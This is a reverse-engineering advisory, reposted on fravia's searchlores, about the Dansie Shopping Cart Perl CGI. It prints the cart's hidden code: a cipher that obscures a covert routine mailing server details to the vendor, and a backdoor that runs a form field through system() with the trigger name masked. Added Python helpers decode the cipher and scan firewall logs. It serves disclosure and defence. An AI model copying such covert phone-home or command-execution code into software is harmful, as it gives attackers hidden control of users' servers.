(Courtesy of fravia's advanced searching lores)
Trojanized Commercial Shopping Cart

by joeATblarg.net
published at fravia's searchlores in April 2000
I was quite interested in this short 'erudite' reversing essay, which I found on my old messageboard in April. I think that it will be quite useful as an 'eye-opener' for all those who don't understand WHY software reverse engineering is so important AS DEFENCE, and why it should BE INCENTIVIZED, rather than forbidden. Or do you really want a future where any bastard can sniff your box without being detected?
Trojanized Commercial Shopping Cart
===============================================================
Dansie Shopping Cart
Version   : 3.04 (presumably earlier versions as well)
Author    : Craig Dansie
URL       : http://www.dansie.net/
Language  : Perl (both NT and Unix platforms are vulnerable)
License   : Commercial, starting at $150.00
Copyright Dec 10, 1997-2000, Dansie Website Design
Synopsis  : This program -deliberately- allows arbitrary commands to be executed on the victim server.
One of our clients, while installing and configuring the Dansie Shopping Cart, ran into difficulty integrating PGP, the shopping cart program, and our secure server setup. While trying to assist our client with the cart and PGP configuration we discovered a couple of things.

The CGI, under certain conditions, sends an email to the author of the Dansie shopping cart software, 'tech@dansie.net'. This is not readily apparent, as the code that handles this transaction incorporates a simple Caesar cipher to hide the email address. The cipher is handled via the subroutine 'there2':
------
sub there2
{
    $_ = "$_[0]";
    # Fixed substitution: each of a-z0-9 in the stored string is replaced by
    # the character at the same position in the second list
    tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;
    tr/_/-/;
    tr/\@/\./;
    return $_;
}
-------
The call that creates this email address and sends the mail is the function 'there3'.
-------
sub there3
{
    # Only on non-NT hosts that have a usable mail program
    if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
    {
        # Recipient ($a) and subject ($b) are rebuilt from ciphered pieces at run time
        $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
        $b = &there2('8v59_3jhhzi8');
        pop(@there2);
        pop(@there2);
        $c = &there2("@there2");
        open (TECH, "|$mailprog $a");
        print TECH "To: $a\n";
        print TECH "From: $a\n";
        print TECH "Subject: $b\n\n";
        print TECH "$path3\n";
        print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";
        print TECH "$c\n";
        print TECH "$e $there\n" if ($e);
        close (TECH);
    }
}
-------
The ciphered strings, when passed through 'there2', result in:
8v59         == tech
kte3cv       == dansie
ev8          == net
8v59_3jhhzi8 == tech-support
$a           == tech@dansie.net
$b           == tech-support (used as the Subject: line)
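To check the decoded values above, here is an added Python port of 'there2' (not part of the original advisory or of the cart's own code) together with its inverse, plus a small scanner that pulls every there2('...') argument out of a Perl source fragment and decodes it; the sample source lines are the $a and $b assignments quoted above.

```python
import re

# Substitution table copied from the cart's there2 subroutine quoted above:
#   tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/; tr/_/-/; tr/\@/\./;
# The left side is what sits in the source file, the right side is the cleartext.
STORED = "abcdefghijklmnopqrstuvwxyz0123456789" + "_@"
CLEAR = "gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth" + "-."

# The three tr/// steps touch disjoint characters, so one per-character map is equivalent.
DECODE = str.maketrans(STORED, CLEAR)
# The table is a permutation of a-z0-9, so it inverts cleanly; this gives the stored
# form of any cleartext, e.g. what to search for to find where $d = 'dansie' is set.
ENCODE = str.maketrans(CLEAR, STORED)

CALL_RE = re.compile(r"&?there2\('([^']*)'\)")


def there2(stored: str) -> str:
    """Port of the cart's there2: turn a stored string into cleartext."""
    return stored.translate(DECODE)


def there2_inverse(clear: str) -> str:
    """Inverse of there2: the stored form an auditor should search the source for."""
    return clear.translate(ENCODE)


def decode_calls(perl_source: str) -> list[tuple[str, str]]:
    """Find every there2('...') call in Perl source text and decode its argument."""
    return [(arg, there2(arg)) for arg in CALL_RE.findall(perl_source)]


# Constructed sample: the $a and $b assignments from there3, as quoted on this page.
SAMPLE = r"""$a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
$b = &there2('8v59_3jhhzi8');"""

if __name__ == "__main__":
    for stored, clear in decode_calls(SAMPLE):
        print(f"{stored:>14} -> {clear}")
    print("stored form of 'dansie':", there2_inverse("dansie"))
```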
This seems curious, but plausible reasons could include ensuring license compliance, or maybe the cart automatically sends this email when an error occurs. The program definitely goes out of its way to hide the fact that the mail is being sent.

While going through the rest of the code we discovered a much more interesting item. (We've masked out the actual trigger element with question marks)
----------
# Fires when the trigger element is present and the host is not $d (or $d is unset)
if ( ( ($FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'}) && (!$d) ) )
{
    if ( $ENV{'OS'} )
    {
        # The form value is handed straight to the shell
        system("$FORM{'?????????'}");
    }
    else
    {
        new Object;
    }
    exit;
}
---------
The form element '?????????', which was originally a pseudo-random-looking nine-digit string of letters and numbers, allows an intruder to execute any command on the server with the same privileges as the CGI process itself. Although this is a full disclosure list, the trigger element is obscured to prevent the script kiddies from running away with this back door. If you own the cart, then you have access to the source code and can discover the element in question easily enough on your own.

Further searches through the code reveal that this form element is immune to data validation - it gets passed into this code fragment unchallenged. The '$d' variable of the condition which permits the back door to function is set elsewhere in the program to contain the string 'dansie' (again, using the ciphertext algorithm). This indicates that the form element won't work on Dansie's own host, but will work on anyone else's. There are additional problems with the 'there' function, but we'll leave them as exercises for the reader to decipher.
Dansie.net, armed with the server name and URL to the CGI executable provided by the cloaked email routine, would be able to run commands on any web server on the Internet that has the Dansie Shopping Cart installed. It takes little imagination to dream up the potential havoc and privacy violations this level of access could result in; from stealing private customer records to a full-blown crack of an E-Commerce server.
When checking to see if this was a known issue, the following post from "Kasey Johns", made a little over a week ago, was discovered in alt.comp.perlcgi.freelance:
http://www.deja.com/getdoc.xp?AN=601644315
Follow-up article: http://www.deja.com/getdoc.xp?AN=601857849
We won't quote Kasey's posts here; in brief, Kasey also discovered the back door and cloaked email routines. Kasey also provides evidence in the post to indicate that not only is Dansie well aware of the back door routine, but may be actively attempting to utilize it.

Based upon our own investigation, the information Kasey posted, and our own firewall logs (see below), it is our opinion that the back door within Dansie.net's shopping cart can best be summarized as follows:
1. The back door is very deliberate.
2. It isn't unique to the one copy we have access to here.
3. *Is being actively utilized by the author of the CGI.

* Based upon the log snippet in Kasey's post showing attempted access to the CGI from an Earthlink dial-up IP (209.179.141.0/24). According to Kasey, access to the CGI was attempted less than 30 minutes after the cart was installed.
When we noticed the attempted usage of Kasey's server, a quick check of our own firewall logs revealed the following:
Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
{repeated several dozen times}
We can only assume these attempts, made from the same /24 on Earthlink's dial-ups as the one used to probe Kasey's server, were from the author of the shopping cart.
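As an added example (not from the original advisory), a short Python check that walks ipchains-style 'Packet log' lines like the one above and counts REJECTed port-80 attempts per source address inside 209.179.141.0/24; the sample lines are constructed, with made-up host octets and a made-up unrelated source, since the page only shows 209.179.141.xx.

```python
import ipaddress
import re
from collections import Counter
from typing import Optional

# Source range named in Kasey's post and in this page's own log excerpt.
SUSPECT_NET = ipaddress.ip_network("209.179.141.0/24")

# ipchains-style "Packet log:" line in the layout quoted on this page:
# chain, target, interface, PROTO=<n>, src:port, dst:port.
LOG_RE = re.compile(
    r"Packet log: (?P<chain>\S+) (?P<target>\S+) (?P<iface>\S+) "
    r"PROTO=(?P<proto>\d+) (?P<src>[\w.]+):(?P<sport>\d+) (?P<dst>[\w.]+):(?P<dport>\d+)"
)

# Constructed sample (not the page's real log): host octets and the
# 198.51.100.9 source are made up; the last line keeps the page's masking.
SAMPLE_LOG = """\
Packet log: input REJECT eth0 PROTO=6 209.179.141.17:1054 x.x.x.x:80
Packet log: input REJECT eth0 PROTO=6 209.179.141.17:1055 x.x.x.x:80
Packet log: input REJECT eth0 PROTO=6 209.179.141.203:1102 x.x.x.x:80
Packet log: input REJECT eth0 PROTO=6 198.51.100.9:2231 x.x.x.x:80
Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
"""


def parse_line(line: str) -> Optional[dict]:
    """Split one Packet log line into its fields, or None if it does not match."""
    m = LOG_RE.search(line)
    return m.groupdict() if m else None


def suspect_hits(log_text: str, net=SUSPECT_NET, dport: int = 80) -> Counter:
    """Count REJECTed attempts to dport whose source lies in net, keyed by source."""
    hits: Counter = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["target"] != "REJECT" or int(rec["dport"]) != dport:
            continue
        try:
            src = ipaddress.ip_address(rec["src"])
        except ValueError:
            continue  # a masked source such as 209.179.141.xx cannot be checked
        if src in net:
            hits[str(src)] += 1
    return hits


if __name__ == "__main__":
    for src, n in suspect_hits(SAMPLE_LOG).items():
        print(f"{n:3d} rejected attempt(s) to port 80 from {src}")
```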
We will not try to hazard a guess as to why Dansie.net felt the need to include a back door within their shopping cart software. Whatever their reasoning may be, it is our opinion that no reason, no matter how well thought out or rationalized, justifies the existence of this back door. No reasoning can possibly explain away a routine that deliberately allows an intruder unrestricted and unauthorized access to any server on the Internet that has the Dansie Shopping Cart installed.